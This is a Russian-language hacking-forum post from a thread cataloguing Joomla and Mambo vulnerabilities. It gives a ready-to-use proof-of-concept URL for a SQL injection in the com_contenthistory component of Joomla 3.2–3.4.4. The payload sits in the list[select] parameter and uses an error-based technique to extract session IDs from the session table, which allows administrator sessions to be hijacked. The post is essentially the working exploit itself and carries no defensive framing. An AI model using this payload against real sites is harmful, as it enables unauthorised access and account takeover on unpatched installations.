Тема: Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов
Показать сообщение отдельно

  #293  
Старый 23.10.2015, 13:48
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
С нами: 8953911

Репутация: 0
По умолчанию
Joomla ver. 3.2/3.4.4

Уязвимый компонент /administrator/components/com_contenthistory/models/history.php

POC:

Цитата:
Сообщение от None  
index.php?option=com_contenthistory&view=history&l ist[ordering]=&item_id=75&type_id=1&list[select]=(select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Подробнее тут.
 
Ответить с цитированием